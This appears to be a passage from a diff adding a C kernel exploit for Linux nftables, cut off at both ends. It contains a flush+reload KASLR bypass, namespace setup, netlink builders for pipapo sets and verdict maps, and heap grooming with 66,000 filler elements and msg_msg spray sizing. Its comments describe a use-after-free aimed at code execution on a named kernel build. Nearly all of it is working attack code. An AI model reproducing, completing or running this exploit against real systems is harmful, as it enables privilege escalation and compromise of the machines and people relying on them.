*/ +#define KASLR_START 0xffffffff81000000ULL +#define KASLR_END 0xffffffffc0000000ULL +#define KASLR_STEP 0x0000000000200000ULL /* 2MB */ +#define KASLR_NADDR ((KASLR_END - KASLR_START) / KASLR_STEP) +#define KASLR_ROUNDS 64 +#define KASLR_TRIALS 7 + +static uint64_t bypass_kaslr(void) { + uint64_t results[KASLR_TRIALS]; + + for (int trial = 0; trial < KASLR_TRIALS; trial++) { + size_t times[KASLR_NADDR]; + for (int i = 0; i < (int)KASLR_NADDR; i++) + times[i] = ~(size_t)0; + + /* Warmup pass */ + for (int i = 0; i < (int)KASLR_NADDR; i++) + flushandreload((void *)(KASLR_START + KASLR_STEP * (uint64_t)i)); + + /* Measure: take minimum across rounds (filters noise) */ + for (int round = 0; round < KASLR_ROUNDS; round++) { + for (int i = 0; i < (int)KASLR_NADDR; i++) { + size_t t = flushandreload((void *)(KASLR_START + KASLR_STEP * (uint64_t)i)); + if (t < times[i]) times[i] = t; + } + } + + /* Find global minimum (= kernel .text timing) */ + size_t min_val = ~(size_t)0; + for (int i = 0; i < (int)KASLR_NADDR; i++) + if (times[i] < min_val) min_val = times[i]; + + /* Threshold: min + 20 cycles. Kernel .text is ~131-138, unmapped is ~201+. + * This captures the .text band with huge margin from unmapped. 
*/ + size_t threshold = min_val + 20; + + /* Find first pair of consecutive addresses below threshold → _stext */ + results[trial] = 0; + for (int i = 0; i < (int)KASLR_NADDR - 1; i++) { + if (times[i] <= threshold && times[i + 1] <= threshold) { + results[trial] = KASLR_START + KASLR_STEP * (uint64_t)i; + break; + } + } + printf("[*] KASLR trial %d: min=%zu thr=%zu → 0x%lx\n", + trial, min_val, threshold, (unsigned long)results[trial]); + } + + /* Boyer-Moore majority vote */ + uint64_t candidate = 0; + int count = 0; + for (int i = 0; i < KASLR_TRIALS; i++) { + if (count == 0) { candidate = results[i]; count = 1; } + else if (candidate == results[i]) count++; + else count--; + } + count = 0; + for (int i = 0; i < KASLR_TRIALS; i++) + if (results[i] == candidate) count++; + + if (count > KASLR_TRIALS / 2 && candidate != 0) { + printf("[+] KASLR bypass: _stext = 0x%lx (%d/%d votes)\n", + (unsigned long)candidate, count, KASLR_TRIALS); + return candidate; + } + + printf("[-] KASLR majority vote failed (%d/%d for 0x%lx)\n", + count, KASLR_TRIALS, (unsigned long)candidate); + return 0; +} + +#if __BYTE_ORDER == __BIG_ENDIAN +#define H32(x) (x) +#else +#define H32(x) __bswap_32(x) +#endif + +#ifndef NLA_F_NESTED +#define NLA_F_NESTED (1 << 15) +#endif +#ifndef SOL_NETLINK +#define SOL_NETLINK 270 +#endif +#ifndef NFNL_MSG_BATCH_BEGIN +#define NFNL_MSG_BATCH_BEGIN 0x10 +#endif +#ifndef NFNL_MSG_BATCH_END +#define NFNL_MSG_BATCH_END 0x11 +#endif +#ifndef NFT_SET_INTERVAL +#define NFT_SET_INTERVAL 0x04 +#endif +#ifndef NFT_SET_MAP +#define NFT_SET_MAP 0x08 +#endif +#ifndef NFT_SET_TIMEOUT +#define NFT_SET_TIMEOUT 0x10 +#endif +#ifndef NFT_SET_CONCAT +#define NFT_SET_CONCAT 0x80 +#endif +#ifndef NFTA_PAYLOAD_DREG +#define NFTA_PAYLOAD_DREG 1 +#define NFTA_PAYLOAD_BASE 2 +#define NFTA_PAYLOAD_OFFSET 3 +#define NFTA_PAYLOAD_LEN 4 +#endif +#ifndef NFT_PAYLOAD_NETWORK_HEADER +#define NFT_PAYLOAD_NETWORK_HEADER 1 +#endif +#ifndef NFT_PAYLOAD_TRANSPORT_HEADER +#define 
NFT_PAYLOAD_TRANSPORT_HEADER 2 +#endif +#ifndef NFT_REG_1 +#define NFT_REG_1 1 +#endif +#ifndef NFT_REG_2 +#define NFT_REG_2 2 +#endif +#ifndef NFT_REG_3 +#define NFT_REG_3 3 +#endif +#ifndef NFT_REG32_00 +#define NFT_REG32_00 8 +#define NFT_REG32_01 9 +#endif +#ifndef NFTA_LOOKUP_DREG +#define NFTA_LOOKUP_DREG 3 +#endif +#ifndef NFTA_PAYLOAD_SREG +#define NFTA_PAYLOAD_SREG 5 +#endif +#ifndef NFTA_SET_ELEM_USERDATA +#define NFTA_SET_ELEM_USERDATA 6 /* enum nft_set_elem_attributes: UNSPEC=0,KEY=1,DATA=2,FLAGS=3,TIMEOUT=4,EXPIRATION=5,USERDATA=6 */ +#endif + +#define BUF_SIZE (8 * 1024 * 1024) +/* 66K fillers → lt_size > 4MB → vmalloc (KMALLOC_MAX_SIZE=4MB on COS-121) + * Count must be ≡ 31 (mod 32) so the target fills the last slab page slot. + * This ensures ALL adjacent objects are fillers (genmask=0), preventing: + * - EXPRESSIONS crash (next object byte 0 = 0 → elem_expr->size = 0) + * - Expiration false-skip (third object has small offsets → "not expired") + */ +/* Target slot = NUM_FILLERS mod 32. After msg_msg reclaim, + * offset[EXPIRATION] = 0xFF (byte 6 of kernel ptr) → reads ext+1020. + * For target at slot N: ext+1020 = N*128+1020. Must be < 4096 (page size) + * → N ≤ 24. So NUM_FILLERS mod 32 must be ≤ 24. + * 66000 mod 32 = 16 → target at slot 16 → ext+1020 = 3068 ✓ (in-page) + * Still > 4MB lt_size → vmalloc forced. */ +#define NUM_FILLERS 66000 /* Just over 64K → lt_size ~4.03MB > 4MB → vmalloc forced */ +#define NUM_TARGETS 1 +#define NUM_PADDING 0 /* Disabled for fast setup; 66K fillers sufficient for vmalloc */ +#define BATCH_CHUNK 2500 + +/* Target element has USERDATA extension → 305 bytes → kmalloc-cg-512. 
+ * 512-byte aligned objects guarantee: + * byte 0 (genmask) = 0x00 → always active ✓ + * byte 8 (offset[EXPRESSIONS]) = 0x00 → no expr eval → no crash ✓ + * AND: offset[EXPIRATION] = 0xFF (byte 6) → reads ext+255 which is + * WITHIN the same 512-byte object → reads mtext data → positive jiffies + * → NOT expired ✓ (This was broken in kmalloc-cg-256 where ext+255 + * crossed into the next object's m_list.next kernel pointer → negative + * signed jiffies → always "expired" → lookup skipped the element.) */ +#define TARGET_UDATA_LEN 200 /* 104 + 1 + 200 = 305 → kmalloc-cg-512 */ + +/* Spray: msg_msg header=48 + data=464 = 512 → kmalloc-cg-512 (same as target) */ +#define NUM_SPRAY_QUEUES 512 +#define NUM_RECLAIM_QUEUES 256 +#define SPRAY_MSG_DSIZE 464 +#define MAX_SPRAY_MSGS 65536 +#define MAX_CYCLES 10 + +/* No pre-spray needed: the 66K fillers (NUM_FILLERS) sit in kmalloc-cg-128 + * due to TIMEOUT extension from non-default timeout (3599999ms ≠ 3600000ms); + * the target is in kmalloc-cg-512 (see TARGET_UDATA_LEN). */ + +#define die(fmt, ...)
do { fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); exit(1); } while(0) + +/* ====== NLA helpers ====== */ +static void nla_put(char *buf, int *off, uint16_t type, const void *data, int len) { + struct { uint16_t nla_len; uint16_t nla_type; } *a = (decltype(a))(buf + *off); + a->nla_len = 4 + len; a->nla_type = type; + if (data && len > 0) memcpy(buf + *off + 4, data, len); + *off += (4 + len + 3) & ~3; +} +static void nla_put_str(char *buf, int *off, uint16_t type, const char *s) { + nla_put(buf, off, type, s, strlen(s) + 1); +} +static void nla_put_u32(char *buf, int *off, uint16_t type, uint32_t v) { + v = H32(v); nla_put(buf, off, type, &v, 4); +} +static void nla_put_u64(char *buf, int *off, uint16_t type, uint64_t v) { + v = htobe64(v); nla_put(buf, off, type, &v, 8); +} +static int nest_start(char *buf, int *off, uint16_t type) { + int s = *off; + struct { uint16_t nla_len; uint16_t nla_type; } *a = (decltype(a))(buf + *off); + a->nla_len = 0; a->nla_type = type | NLA_F_NESTED; + *off += 4; return s; +} +static void nest_end(char *buf, int *off, int s) { + ((uint16_t *)(buf + s))[0] = *off - s; +} + +/* ====== Netlink ====== */ +static void msg_hdr(char *buf, int *off, uint16_t type, uint16_t flags, uint8_t fam) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | type; + n->nlmsg_flags = NLM_F_REQUEST | flags; + n->nlmsg_seq = n->nlmsg_pid = 0; + *off += sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = fam; g->version = NFNETLINK_V0; g->res_id = 0; + *off += sizeof(*g); +} +static void msg_end(char *buf, int hdr, int *off) { + ((struct nlmsghdr *)(buf + hdr))->nlmsg_len = *off - hdr; +} +static void batch_begin(char *buf, int *off) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = NFNL_MSG_BATCH_BEGIN; n->nlmsg_flags = NLM_F_REQUEST; + n->nlmsg_seq = n->nlmsg_pid = 0; + n->nlmsg_len = sizeof(*n) + sizeof(struct nfgenmsg); + *off += 
sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = AF_UNSPEC; g->version = NFNETLINK_V0; + g->res_id = H32(NFNL_SUBSYS_NFTABLES) >> 16; + *off += sizeof(*g); +} +static void batch_end(char *buf, int *off) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = NFNL_MSG_BATCH_END; n->nlmsg_flags = NLM_F_REQUEST; + n->nlmsg_seq = n->nlmsg_pid = 0; + n->nlmsg_len = sizeof(*n) + sizeof(struct nfgenmsg); + *off += sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = AF_UNSPEC; g->version = NFNETLINK_V0; + g->res_id = H32(NFNL_SUBSYS_NFTABLES) >> 16; + *off += sizeof(*g); +} + +static void write_file(const char *p, const char *d) { + int fd = open(p, O_WRONLY); if (fd < 0) return; + ssize_t n = write(fd, d, strlen(d)); (void)n; close(fd); +} + +static void setup_ns(void) { + uid_t uid = getuid(); gid_t gid = getgid(); + char m[64]; + if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWIPC) < 0) { + /* Fall back without IPC namespace */ + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) + die("unshare: %s", strerror(errno)); + printf("[*] IPC namespace: shared (host)\n"); + } else { + printf("[*] IPC namespace: private\n"); + } + write_file("/proc/self/setgroups", "deny"); + snprintf(m, sizeof(m), "0 %d 1\n", uid); write_file("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %d 1\n", gid); write_file("/proc/self/gid_map", m); +} + +static void setup_lo(void) { + /* Bring up loopback for both IPv4 and IPv6 */ + int fd = socket(AF_INET, SOCK_DGRAM, 0); + struct ifreq ifr = {}; strncpy(ifr.ifr_name, "lo", IFNAMSIZ); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + /* IPv6 ::1 is auto-assigned when lo comes up in a new netns */ + usleep(100000); /* 100ms for IPv6 DAD */ +} + +static int nl_open(void) { + int fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER); + if (fd < 0) die("nl socket: %s", strerror(errno)); + struct 
sockaddr_nl a = { .nl_family = AF_NETLINK }; + if (bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) die("nl bind"); + int bs = 16<<20; + setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bs, sizeof(bs)); + setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bs, sizeof(bs)); + return fd; +} + +static int nl_send(int fd, char *buf, int len) { + struct sockaddr_nl a = { .nl_family = AF_NETLINK }; + struct iovec v = {}; v.iov_base = buf; v.iov_len = len; + struct msghdr m = {}; m.msg_name = &a; m.msg_namelen = sizeof(a); m.msg_iov = &v; m.msg_iovlen = 1; + return sendmsg(fd, &m, 0) < 0 ? -errno : 0; +} + +static int nl_recv_ack(int fd) { + char r[16384]; + struct timeval tv = { 120, 0 }; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + int n = recv(fd, r, sizeof(r), 0); + if (n < 0) return -errno; + for (struct nlmsghdr *h = (struct nlmsghdr *)r; NLMSG_OK(h, (unsigned int)n); h = NLMSG_NEXT(h, n)) { + if (h->nlmsg_type == NLMSG_ERROR) { + int e = ((struct nlmsgerr *)NLMSG_DATA(h))->error; + if (e) return e; + } + } + return 0; +} + +static int nl_do(int fd, char *buf, int len) { + int r = nl_send(fd, buf, len); + if (r) return r; + return nl_recv_ack(fd); +} + +/* ====== NFT operations ====== */ +static int nft_table(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWTABLE, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_TABLE_NAME, "t"); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +static int nft_chain(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWCHAIN, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_CHAIN_TABLE, "t"); + nla_put_str(buf, &off, NFTA_CHAIN_NAME, "c"); + uint32_t pol = H32(NF_ACCEPT); + nla_put(buf, &off, NFTA_CHAIN_POLICY, &pol, 4); + int hk = nest_start(buf, &off, NFTA_CHAIN_HOOK); + nla_put_u32(buf, &off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nla_put_u32(buf, &off, 
NFTA_HOOK_PRIORITY, 0); + nest_end(buf, &off, hk); + nla_put_str(buf, &off, NFTA_CHAIN_TYPE, "filter"); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +static int nft_set_common(int fd, char *buf, const char *name, int id, + uint32_t data_type, uint32_t data_len) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWSET, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_NAME, name); + nla_put_u32(buf, &off, NFTA_SET_ID, id); + nla_put_u32(buf, &off, NFTA_SET_FLAGS, + NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_CONCAT | NFT_SET_MAP); + nla_put_u32(buf, &off, NFTA_SET_KEY_LEN, 32); /* Two 16-byte fields */ + nla_put_u32(buf, &off, NFTA_SET_KEY_TYPE, 0); + nla_put_u32(buf, &off, NFTA_SET_DATA_TYPE, data_type); + nla_put_u32(buf, &off, NFTA_SET_DATA_LEN, data_len); + nla_put_u64(buf, &off, NFTA_SET_TIMEOUT, 3600000ULL); /* 1hr default */ + nla_put_u32(buf, &off, NFTA_SET_GC_INTERVAL, 1000); /* 1s GC */ + /* Concat desc: 2 fields of 16 bytes each */ + int d = nest_start(buf, &off, NFTA_SET_DESC); + int cc = nest_start(buf, &off, NFTA_SET_DESC_CONCAT); + int f1 = nest_start(buf, &off, 1); + nla_put_u32(buf, &off, NFTA_SET_FIELD_LEN, 16); + nest_end(buf, &off, f1); + int f2 = nest_start(buf, &off, 1); + nla_put_u32(buf, &off, NFTA_SET_FIELD_LEN, 16); + nest_end(buf, &off, f2); + nest_end(buf, &off, cc); + nest_end(buf, &off, d); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Data map set "s" — for Phase 1 heap leak observation */ +static int nft_set(int fd, char *buf) { + return nft_set_common(fd, buf, "s", 1, 1 /* NFT_DATA_VALUE */, 8); +} + +/* Verdict map set "v" — for Phase 3 code execution. + * NFT_DATA_VERDICT = 0xffffff00. Data len = 16 (sizeof nft_data verdict). 
*/ +#define NFT_DATA_VERDICT 0xffffff00U +static int nft_set_v(int fd, char *buf) { + return nft_set_common(fd, buf, "v", 2, NFT_DATA_VERDICT, 16); +} + +static void add_payload_expr(char *buf, int *off, uint32_t dreg, uint32_t base, + uint32_t offset, uint32_t len) { + int e = nest_start(buf, off, 1); + nla_put_str(buf, off, NFTA_EXPR_NAME, "payload"); + int d = nest_start(buf, off, NFTA_EXPR_DATA); + nla_put_u32(buf, off, NFTA_PAYLOAD_DREG, dreg); + nla_put_u32(buf, off, NFTA_PAYLOAD_BASE, base); + nla_put_u32(buf, off, NFTA_PAYLOAD_OFFSET, offset); + nla_put_u32(buf, off, NFTA_PAYLOAD_LEN, len); + nest_end(buf, off, d); + nest_end(buf, off, e); +} + +static int nft_rule(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWRULE, + NLM_F_CREATE|NLM_F_APPEND|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_RULE_TABLE, "t"); + nla_put_str(buf, &off, NFTA_RULE_CHAIN, "c"); + int exprs = nest_start(buf, &off, NFTA_RULE_EXPRESSIONS); + + /* Extract src IPv6 (16 bytes at offset 8 from network header) → REG_1 */ + add_payload_expr(buf, &off, NFT_REG_1, NFT_PAYLOAD_NETWORK_HEADER, 8, 16); + /* Extract dst IPv6 (16 bytes at offset 24 from network header) → REG_2 */ + add_payload_expr(buf, &off, NFT_REG_2, NFT_PAYLOAD_NETWORK_HEADER, 24, 16); + + /* Lookup in set "s", sreg=REG_1 (reads 32 bytes: REG_1+REG_2), dreg=REG_3 */ + int le = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "lookup"); + int ld = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_str(buf, &off, NFTA_LOOKUP_SET, "s"); + nla_put_u32(buf, &off, NFTA_LOOKUP_SREG, NFT_REG_1); + nla_put_u32(buf, &off, NFTA_LOOKUP_DREG, NFT_REG_3); + nest_end(buf, &off, ld); + nest_end(buf, &off, le); + + /* Write REG_3 data to transport header + 8 (UDP payload first 8 bytes) */ + int pe = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "payload"); + int pd = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_u32(buf, &off, 
NFTA_PAYLOAD_SREG, NFT_REG_3); + nla_put_u32(buf, &off, NFTA_PAYLOAD_BASE, NFT_PAYLOAD_TRANSPORT_HEADER); + nla_put_u32(buf, &off, NFTA_PAYLOAD_OFFSET, 8); + nla_put_u32(buf, &off, NFTA_PAYLOAD_LEN, 8); + nest_end(buf, &off, pd); + nest_end(buf, &off, pe); + + nest_end(buf, &off, exprs); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Forward declarations for key builders (defined later) */ +static void build_filler_key(uint8_t *key, int idx); +static void build_filler_key_end(uint8_t *key, int idx); +static void build_target_key(uint8_t *key); + +/* Verdict map lookup rule: payload → lookup(v, dreg=VERDICT). + * When lookup succeeds, verdict is set from ext DATA (our controlled fake verdict). */ +static int nft_rule_v(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWRULE, + NLM_F_CREATE|NLM_F_APPEND|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_RULE_TABLE, "t"); + nla_put_str(buf, &off, NFTA_RULE_CHAIN, "c"); + int exprs = nest_start(buf, &off, NFTA_RULE_EXPRESSIONS); + + /* Extract src IPv6 → REG_1 */ + add_payload_expr(buf, &off, NFT_REG_1, NFT_PAYLOAD_NETWORK_HEADER, 8, 16); + /* Extract dst IPv6 → REG_2 */ + add_payload_expr(buf, &off, NFT_REG_2, NFT_PAYLOAD_NETWORK_HEADER, 24, 16); + + /* Lookup in verdict map "v", sreg=REG_1, dreg=NFT_REG_VERDICT (=0) */ + int le = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "lookup"); + int ld = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_str(buf, &off, NFTA_LOOKUP_SET, "v"); + nla_put_u32(buf, &off, NFTA_LOOKUP_SREG, NFT_REG_1); + nla_put_u32(buf, &off, NFTA_LOOKUP_DREG, 0); /* NFT_REG_VERDICT = 0 */ + nest_end(buf, &off, ld); + nest_end(buf, &off, le); + + nest_end(buf, &off, exprs); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Add fillers to a named set. Same logic as add_fillers but takes set name. 
*/ +static int add_fillers_to(int fd, char *buf, int count, const char *setname) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, setname); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_filler_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_filler_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + /* Data: verdict map uses NFTA_DATA_VERDICT nested attr */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(buf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(buf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF /* NFT_CONTINUE */); + nest_end(buf, &off, vd); + nest_end(buf, &off, dt); } + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 3599999ULL); + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] 
Filler batch at %d for %s failed: %d\n", sent, setname, r); return r; } + sent += chunk; + if (sent % 5000 == 0 || sent >= count) + printf("[+] Fillers(%s): %d/%d\n", setname, sent, count); + } + return 0; +} + +/* Add target element to verdict map "v" with USERDATA (→ kmalloc-cg-512) */ +static int add_target_v(int fd, char *buf) { + uint8_t key[32]; + int off = 0; batch_begin(buf, &off); + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "v"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_target_key(key); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, ke); + /* Data: NFT_CONTINUE verdict (will be overwritten by our UAF spray) */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(buf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(buf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF /* NFT_CONTINUE */); + nest_end(buf, &off, vd); + nest_end(buf, &off, dt); } + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 2000ULL); /* 2s timeout */ + { uint8_t udata[TARGET_UDATA_LEN]; + memset(udata, 0xCC, TARGET_UDATA_LEN); + nla_put(buf, &off, NFTA_SET_ELEM_USERDATA, udata, TARGET_UDATA_LEN); + } + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* + * Build IPv6 key bytes (32 bytes: src_ipv6 ++ dst_ipv6). 
+ * For filler N: src = 2001:db8:0:0:0:0:XXYY:0, dst = same + * where XX = N >> 8, YY = N & 0xFF + */ +static void build_filler_key(uint8_t *key, int idx) { + memset(key, 0, 32); + /* src_ipv6 = 2001:0db8::XXYY:0000 */ + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb8; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + /* dst_ipv6 = same as src */ + memcpy(key + 16, key, 16); +} + +static void build_filler_key_end(uint8_t *key, int idx) { + memset(key, 0, 32); + /* src_ipv6 end = 2001:0db8::XXYY:00FF */ + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb8; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + key[15] = 0xFF; + /* dst_ipv6 end = same */ + memcpy(key + 16, key, 16); +} + +/* Target key: src=::1, dst=::1 (point range) */ +static void build_target_key(uint8_t *key) { + memset(key, 0, 32); + key[15] = 1; /* src = ::1 */ + key[31] = 1; /* dst = ::1 */ +} + +static int add_fillers(int fd, char *buf, int count) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? 
NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + /* Key */ + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_filler_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + /* Key end */ + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_filler_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + /* Data */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0xDEADBEEFCAFE0000ULL | (idx & 0xFFFF); + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* Timeout differs from set default (3600000) to force TIMEOUT extension. + * Without this: 96B (KEY+KEY_END+DATA+EXPIRATION) → kmalloc-cg-96 + * With this: 104B (+TIMEOUT) → kmalloc-cg-128 (the target itself is in kmalloc-cg-512) */ + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 3599999ULL); + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] Filler batch at %d failed: %d\n", sent, r); return r; } + sent += chunk; + if (sent % 5000 == 0 || sent >= count) + printf("[+] Fillers: %d/%d\n", sent, count); + } + return 0; +} + +/* Padding elements: use 2001:db9:: prefix, NO per-element timeout → + * 96 bytes (KEY+KEY_END+DATA+EXPIRATION) → kmalloc-cg-96. + * These inflate pipapo lt_size without polluting kmalloc-cg-128.
*/ +static void build_padding_key(uint8_t *key, int idx) { + memset(key, 0, 32); + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb9; /* 2001:0db9:: */ + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + memcpy(key + 16, key, 16); +} + +static void build_padding_key_end(uint8_t *key, int idx) { + memset(key, 0, 32); + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb9; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + key[15] = 0xFF; + memcpy(key + 16, key, 16); +} + +static int add_padding(int fd, char *buf, int count) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_padding_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_padding_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0; + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* NO NFTA_SET_ELEM_TIMEOUT → uses set default 3600000ms → + * no TIMEOUT extension → 96B → kmalloc-cg-96 */ + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] 
